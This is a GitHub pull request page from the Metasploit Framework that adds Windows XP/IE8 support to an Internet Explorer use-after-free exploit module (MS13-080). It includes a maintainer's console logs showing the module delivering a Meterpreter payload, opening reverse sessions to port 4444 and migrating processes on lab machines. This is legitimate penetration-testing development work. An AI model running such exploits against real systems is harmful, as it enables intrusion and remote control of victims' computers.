Join GitHub today
GitHub is home to over 28 million developers working together to host and review code, manage projects, and build software together.
Sign upwin XP IE8 exploit for MS13-080 #4213
Conversation
webstersprodigy
added some commits
Nov 15, 2014
wchen-r7
added
the
module
label
Nov 16, 2014
wchen-r7
self-assigned this
Nov 16, 2014
todb-r7
added
the
feature
label
Nov 17, 2014
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Show comment
Hide comment
wchen-r7
Nov 22, 2014
Contributor
I have not forgotten this PR. Want to do this but occupied with other stuff atm.
|
I have not forgotten this PR. Want to do this but occupied with other stuff atm. |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Show comment
Hide comment
wchen-r7
Dec 3, 2014
Contributor
Tested:
IE9:
msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://0.0.0.0:8080/mtAFOHcX6lJL
[*] Local IP: http://10.6.0.118:8080/mtAFOHcX6lJL
[*] Server started.
[*] 10.6.0.209 ie_setmousecapture_uaf - Gathering target information.
[*] 10.6.0.209 ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 10.6.0.209
[*] Meterpreter session 1 opened (10.6.0.118:4444 -> 10.6.0.209:49203) at 2014-12-03 13:43:56 -0600
[*] Session ID 1 (10.6.0.118:4444 -> 10.6.0.209:49203) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (2420)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1088
[+] Successfully migrated to process
msf exploit(ie_setmousecapture_uaf) >
IE8 (XP):
msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://172.16.23.1:8080/AcUinEiHgAWdsWM
[*] Server started.
[*] 172.16.23.129 ie_setmousecapture_uaf - Gathering target information.
[*] 172.16.23.129 ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 172.16.23.129
[*] Meterpreter session 3 opened (172.16.23.1:4444 -> 172.16.23.129:1951) at 2014-12-03 14:10:42 -0600
[*] Session ID 3 (172.16.23.1:4444 -> 172.16.23.129:1951) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (876)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2252
[+] Successfully migrated to process
|
Tested: IE9: IE8 (XP): |
added a commit
to wchen-r7/metasploit-framework
that referenced
this pull request
Dec 3, 2014
wchen-r7
merged commit 27d5ed6
into
rapid7:master
Dec 3, 2014
1 check passed
continuous-integration/travis-ci
The Travis CI build passed
Details
added a commit
that referenced
this pull request
Dec 3, 2014
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
webstersprodigy commentedNov 15, 2014
ie_setmousecapture_uaf only supported IE9 on windows 7, but the vuln was present in different versions of IE. I tested with Windows xp sp3 and IE8 and the exploit works pretty reliably (included the specific mshtml version in the code). I did not test that I did not break the win7 IE9 exploit as I didn't have that setup (but there shouldn't be anything changed)
This pull request is probably not very useful in real life - I was just messing around.